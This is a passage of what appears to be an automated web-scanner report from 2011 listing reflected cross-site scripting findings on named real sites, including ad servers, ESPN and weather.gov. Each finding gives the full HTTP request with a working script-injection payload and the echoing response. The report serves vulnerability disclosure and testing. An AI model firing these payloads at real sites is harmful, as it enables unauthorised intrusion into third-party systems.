Cookie: pbj=c141224b73feb9193565e6eeb03e001298670485; __qca=P0-1048600453-1298670520461; __utmz=133238479.1298686864.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=133238479.1282775871.1298670519.1298670519.1298686864.2; __utmc=133238479; __utmb=133238479.1.10.1298686864

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Sat, 26 Feb 2011 02:31:30 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Frame-Options: deny
Expires: Fri, 25 Feb 2011 02:31:30 GMT
Cache-Control: no-cache
Content-Length: 25423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
<meta http-equiv="cont
...[SNIP]...
<a href="http://projects.webappsec.org/w/page-revisions/13246986/ab8641"><img src=a onerror=alert(1)>0f2d26e32b6?show_all=1">
...[SNIP]...

3.294. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload f0150<script>alert(1)</script>d9fc77691a6 was submitted in the slotname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gampad/ads?correlator=1298497010810&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-4809460702016037&slotname=KOMO_Homepage_Hyperlocal_Ad_Slot_IP_300x250f0150<script>alert(1)</script>d9fc77691a6&page_slots=KOMO_Homepage_Hyperlocal_Ad_Slot_IP_300x250&cookie_enabled=1&ga_vid=758392942.1298497003&ga_sid=1298497003&ga_hid=1659860762&ga_fc=true&url=http%3A%2F%2Fwww.komonews.com%2F&lmt=1298518211&dt=1298497010811&cc=33&biw=1210&bih=642&ifi=1&adk=2142605729&u_tz=-360&u_his=1&u_java=true&u_h=768&u_w=1364&u_ah=724&u_aw=1364&u_cd=16&u_nplug=9&u_nmime=44&flash=10.2.154 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.komonews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Wed, 23 Feb 2011 21:38:36 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 2773

GA_googleSetAdContentsBySlotForSync({"KOMO_Homepage_Hyperlocal_Ad_Slot_IP_300x250f0150<script>alert(1)</script>d9fc77691a6":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f
...[SNIP]...

3.295. http://qa.wimgo.com/bloomfield-nm/shopping/musical-instruments/x22 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://qa.wimgo.com
Path:   /bloomfield-nm/shopping/musical-instruments/x22

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2093"-alert(1)-"0fd1d4f72b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bloomfield-nm/shopping/musical-instrumentse2093"-alert(1)-"0fd1d4f72b0/x22 HTTP/1.1
Host: qa.wimgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:18:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3 ZendServer/5.0
Set-Cookie: PHPSESSID=g7r6tdiihg9dd8pt4okfrb2rh7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AcGJoYWdlbFBicXI9SEYmcGJoYWdlbEFuenI9SGF2Z3JxK0ZnbmdyZiZlcnR2YmE9R0smcHZnbD1Rbnl5bmYmY2JmZ255UGJxcj03NTIwNyZ5bmd2Z2hxcj0zMi43ODI1JnliYXR2Z2hxcj0tOTYuODIwNyZuZXJuUGJxcj0yMTQmcXpuUGJxcj02MjMmcGJoYWdlbFBicXIzPUhGTiZtdmM9NzUyMDcmZmduZ3I9R0s%3D; expires=Sat, 26-Feb-2011 03:18:38 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3ANjQyOA%3D%3D; expires=Sat, 26-Feb-2011 03:18:38 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _c=2483; expires=Sat, 26-Feb-2011 03:18:38 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3AMjQ4Mw%3D%3D; expires=Sat, 26-Feb-2011 03:18:38 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AeW5ndmdocXI9MzYuNzEwNzIyJnliYXR2Z2hxcj0tMTA3Ljk4MjY2OCZwdmdsPU95YmJ6c3ZyeXEmZmduZ3I9QVo%3D; expires=Sat, 26-Feb-2011 03:18:38 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:18:38 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:18:38 GMT; path=/; domain=qa.wimgo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
" ) );
});
$( "#slider" ).bind( "slidechange", function(event, ui) {
setRadius( $(this).slider( "option", "value" ) );
radiusUrl = "/bloomfield-nm/shopping/musical-instrumentse2093"-alert(1)-"0fd1d4f72b0/x22?radius=RADIUS";
radiusUrl = radiusUrl.replace( 'RADIUS', $(this).slider( "option", "value" ) );
window.location = radiusUrl;
});
$( "select.f-left" ).change(function () {

...[SNIP]...

3.296. http://qa.wimgo.com/bloomfield-nm/shopping/musical-instruments/x22 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://qa.wimgo.com
Path:   /bloomfield-nm/shopping/musical-instruments/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec907"><script>alert(1)</script>dfc89eb5c90 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bloomfield-nm/shopping/musical-instrumentsec907"><script>alert(1)</script>dfc89eb5c90/x22 HTTP/1.1
Host: qa.wimgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:18:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3 ZendServer/5.0
Set-Cookie: PHPSESSID=el4ekel9u3jv3uo8qkc3utlk77; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AcGJoYWdlbFBicXI9SEYmcGJoYWdlbEFuenI9SGF2Z3JxK0ZnbmdyZiZlcnR2YmE9R0smcHZnbD1Rbnl5bmYmY2JmZ255UGJxcj03NTIwNyZ5bmd2Z2hxcj0zMi43ODI1JnliYXR2Z2hxcj0tOTYuODIwNyZuZXJuUGJxcj0yMTQmcXpuUGJxcj02MjMmcGJoYWdlbFBicXIzPUhGTiZtdmM9NzUyMDcmZmduZ3I9R0s%3D; expires=Sat, 26-Feb-2011 03:18:26 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3ANjQyOA%3D%3D; expires=Sat, 26-Feb-2011 03:18:26 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _c=2483; expires=Sat, 26-Feb-2011 03:18:26 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3AMjQ4Mw%3D%3D; expires=Sat, 26-Feb-2011 03:18:26 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AeW5ndmdocXI9MzYuNzEwNzIyJnliYXR2Z2hxcj0tMTA3Ljk4MjY2OCZwdmdsPU95YmJ6c3ZyeXEmZmduZ3I9QVo%3D; expires=Sat, 26-Feb-2011 03:18:26 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:18:26 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:18:26 GMT; path=/; domain=qa.wimgo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<a rel="nofollow" href="/bloomfield-nm/shopping/musical-instrumentsec907"><script>alert(1)</script>dfc89eb5c90/x22?navs=39%2C394%2C135%2C80%2C832%2C618%2C0%2C0&nv1=Attractions">
...[SNIP]...

3.297. http://qa.wimgo.com/bloomfield-nm/shopping/musical-instruments/x22 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://qa.wimgo.com
Path:   /bloomfield-nm/shopping/musical-instruments/x22

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a6de"-alert(1)-"b1c598501c5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bloomfield-nm/shopping/musical-instruments/x229a6de"-alert(1)-"b1c598501c5 HTTP/1.1
Host: qa.wimgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:19:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3 ZendServer/5.0
Set-Cookie: PHPSESSID=ka25urdt89ool7794ausasb6r5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AcGJoYWdlbFBicXI9SEYmcGJoYWdlbEFuenI9SGF2Z3JxK0ZnbmdyZiZlcnR2YmE9R0smcHZnbD1Rbnl5bmYmY2JmZ255UGJxcj03NTIwNyZ5bmd2Z2hxcj0zMi43ODI1JnliYXR2Z2hxcj0tOTYuODIwNyZuZXJuUGJxcj0yMTQmcXpuUGJxcj02MjMmcGJoYWdlbFBicXIzPUhGTiZtdmM9NzUyMDcmZmduZ3I9R0s%3D; expires=Sat, 26-Feb-2011 03:19:09 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3ANjQyOA%3D%3D; expires=Sat, 26-Feb-2011 03:19:09 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _c=2483; expires=Sat, 26-Feb-2011 03:19:09 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3AMjQ4Mw%3D%3D; expires=Sat, 26-Feb-2011 03:19:09 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AeW5ndmdocXI9MzYuNzEwNzIyJnliYXR2Z2hxcj0tMTA3Ljk4MjY2OCZwdmdsPU95YmJ6c3ZyeXEmZmduZ3I9QVo%3D; expires=Sat, 26-Feb-2011 03:19:09 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:19:09 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:19:09 GMT; path=/; domain=qa.wimgo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
);
});
$( "#slider" ).bind( "slidechange", function(event, ui) {
setRadius( $(this).slider( "option", "value" ) );
radiusUrl = "/bloomfield-nm/shopping/musical-instruments/x229a6de"-alert(1)-"b1c598501c5?radius=RADIUS";
radiusUrl = radiusUrl.replace( 'RADIUS', $(this).slider( "option", "value" ) );
window.location = radiusUrl;
});
$( "select.f-left" ).change(function () {

...[SNIP]...

3.298. http://qa.wimgo.com/bloomfield-nm/shopping/musical-instruments/x22 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://qa.wimgo.com
Path:   /bloomfield-nm/shopping/musical-instruments/x22

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92fce"><script>alert(1)</script>de7cf7e6ed3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bloomfield-nm/shopping/musical-instruments/x2292fce"><script>alert(1)</script>de7cf7e6ed3 HTTP/1.1
Host: qa.wimgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:18:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3 ZendServer/5.0
Set-Cookie: PHPSESSID=fqj5h9h5515ffsn856fdnqpui5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AcGJoYWdlbFBicXI9SEYmcGJoYWdlbEFuenI9SGF2Z3JxK0ZnbmdyZiZlcnR2YmE9R0smcHZnbD1Rbnl5bmYmY2JmZ255UGJxcj03NTIwNyZ5bmd2Z2hxcj0zMi43ODI1JnliYXR2Z2hxcj0tOTYuODIwNyZuZXJuUGJxcj0yMTQmcXpuUGJxcj02MjMmcGJoYWdlbFBicXIzPUhGTiZtdmM9NzUyMDcmZmduZ3I9R0s%3D; expires=Sat, 26-Feb-2011 03:18:58 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3ANjQyOA%3D%3D; expires=Sat, 26-Feb-2011 03:18:58 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _c=2483; expires=Sat, 26-Feb-2011 03:18:58 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3AMjQ4Mw%3D%3D; expires=Sat, 26-Feb-2011 03:18:58 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AeW5ndmdocXI9MzYuNzEwNzIyJnliYXR2Z2hxcj0tMTA3Ljk4MjY2OCZwdmdsPU95YmJ6c3ZyeXEmZmduZ3I9QVo%3D; expires=Sat, 26-Feb-2011 03:18:58 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:18:58 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:18:58 GMT; path=/; domain=qa.wimgo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<a rel="nofollow" href="/bloomfield-nm/shopping/musical-instruments/x2292fce"><script>alert(1)</script>de7cf7e6ed3?navs=39%2C394%2C135%2C80%2C832%2C618%2C0%2C0&nv1=Attractions">
...[SNIP]...

3.299. http://qa.wimgo.com/bloomfield-nm/shopping/musical-instruments/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://qa.wimgo.com
Path:   /bloomfield-nm/shopping/musical-instruments/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa2f6"-alert(1)-"347f33fe799 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bloomfield-nm/shopping/musical-instruments/x22?aa2f6"-alert(1)-"347f33fe799=1 HTTP/1.1
Host: qa.wimgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:16:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3 ZendServer/5.0
Set-Cookie: PHPSESSID=732g8mos0bpq6idorsb2stopq5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AcGJoYWdlbFBicXI9SEYmcGJoYWdlbEFuenI9SGF2Z3JxK0ZnbmdyZiZlcnR2YmE9R0smcHZnbD1Rbnl5bmYmY2JmZ255UGJxcj03NTIwNyZ5bmd2Z2hxcj0zMi43ODI1JnliYXR2Z2hxcj0tOTYuODIwNyZuZXJuUGJxcj0yMTQmcXpuUGJxcj02MjMmcGJoYWdlbFBicXIzPUhGTiZtdmM9NzUyMDcmZmduZ3I9R0s%3D; expires=Sat, 26-Feb-2011 03:16:51 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3ANjQyOA%3D%3D; expires=Sat, 26-Feb-2011 03:16:51 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _c=2483; expires=Sat, 26-Feb-2011 03:16:51 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3AMjQ4Mw%3D%3D; expires=Sat, 26-Feb-2011 03:16:51 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AeW5ndmdocXI9MzYuNzEwNzIyJnliYXR2Z2hxcj0tMTA3Ljk4MjY2OCZwdmdsPU95YmJ6c3ZyeXEmZmduZ3I9QVo%3D; expires=Sat, 26-Feb-2011 03:16:51 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:16:51 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:16:52 GMT; path=/; domain=qa.wimgo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
;
});
$( "#slider" ).bind( "slidechange", function(event, ui) {
setRadius( $(this).slider( "option", "value" ) );
radiusUrl = "/bloomfield-nm/shopping/musical-instruments/x22?aa2f6"-alert(1)-"347f33fe799=1&radius=RADIUS";
radiusUrl = radiusUrl.replace( 'RADIUS', $(this).slider( "option", "value" ) );
window.location = radiusUrl;
});
$( "select.f-left" ).change(function () {

...[SNIP]...

3.300. http://qa.wimgo.com/bloomfield-nm/shopping/musical-instruments/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://qa.wimgo.com
Path:   /bloomfield-nm/shopping/musical-instruments/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 145d2"><script>alert(1)</script>dfc358508db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bloomfield-nm/shopping/musical-instruments/x22?145d2"><script>alert(1)</script>dfc358508db=1 HTTP/1.1
Host: qa.wimgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:16:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3 ZendServer/5.0
Set-Cookie: PHPSESSID=kplke0fp6227hhtnkrqq4j5p27; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AcGJoYWdlbFBicXI9SEYmcGJoYWdlbEFuenI9SGF2Z3JxK0ZnbmdyZiZlcnR2YmE9R0smcHZnbD1Rbnl5bmYmY2JmZ255UGJxcj03NTIwNyZ5bmd2Z2hxcj0zMi43ODI1JnliYXR2Z2hxcj0tOTYuODIwNyZuZXJuUGJxcj0yMTQmcXpuUGJxcj02MjMmcGJoYWdlbFBicXIzPUhGTiZtdmM9NzUyMDcmZmduZ3I9R0s%3D; expires=Sat, 26-Feb-2011 03:16:36 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3ANjQyOA%3D%3D; expires=Sat, 26-Feb-2011 03:16:36 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _c=2483; expires=Sat, 26-Feb-2011 03:16:36 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3AMjQ4Mw%3D%3D; expires=Sat, 26-Feb-2011 03:16:36 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AeW5ndmdocXI9MzYuNzEwNzIyJnliYXR2Z2hxcj0tMTA3Ljk4MjY2OCZwdmdsPU95YmJ6c3ZyeXEmZmduZ3I9QVo%3D; expires=Sat, 26-Feb-2011 03:16:36 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:16:36 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:16:36 GMT; path=/; domain=qa.wimgo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<a rel="nofollow" href="/bloomfield-nm/shopping/musical-instruments/x22?145d2"><script>alert(1)</script>dfc358508db=1&navs=39%2C394%2C135%2C80%2C832%2C618%2C0%2C0&nv1=Attractions">
...[SNIP]...

3.301. https://r.espn.go.com/members/util/getUserInfo [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://r.espn.go.com
Path:   /members/util/getUserInfo

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload e042f<script>alert(1)</script>2f8618a1586 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /members/util/getUserInfo?cb=runOmnitureIndependentlye042f<script>alert(1)</script>2f8618a1586 HTTP/1.1
Host: r.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 108
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
p3p: CP=CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE

runOmnitureIndependentlye042f<script>alert(1)</script>2f8618a1586(null, null, null, null, null, null, null);

3.302. http://radar.weather.gov/radar_lite.php [loop parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://radar.weather.gov
Path:   /radar_lite.php

Issue detail

The value of the loop request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbf71"%20a%3db%20e62e3e0d62b was submitted in the loop parameter. This input was echoed as bbf71" a=b e62e3e0d62b in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /radar_lite.php?product=N0R&rid=GYX&loop=nobbf71"%20a%3db%20e62e3e0d62b HTTP/1.1
Host: radar.weather.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Age: 0
Date: Sat, 26 Feb 2011 02:18:31 GMT
Content-Length: 14076
Content-Type: text/html; charset=UTF-8
Expires: Sat, 26 Feb 2011 02:28:31 GMT
Cache-Control: max-age=600
Server: Apache
Via: 1.1 hyacinth (NetCache NetApp/6.0.3), 1.0 c3.w3.woc (squid)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head>
<title>National Weather Service radar from Portland, ME</title>
<meta nam
...[SNIP]...
<a class="navbar" href="radar.php?rid=gyx&overlays=11101111&product=N0R&loop=nobbf71" a=b e62e3e0d62b" title="Go to the Enhanced Version">
...[SNIP]...

3.303. http://radar.weather.gov/radar_lite.php [product parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://radar.weather.gov
Path:   /radar_lite.php

Issue detail

The value of the product request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b52b"%20a%3db%20b5abd972cb4 was submitted in the product parameter. This input was echoed as 3b52b\" a=b b5abd972cb4 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /radar_lite.php?product=N0R3b52b"%20a%3db%20b5abd972cb4&rid=GYX&loop=no HTTP/1.1
Host: radar.weather.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Age: 0
X-Cache-TTL: 172800
Date: Sat, 26 Feb 2011 02:15:01 GMT
Content-Length: 14089
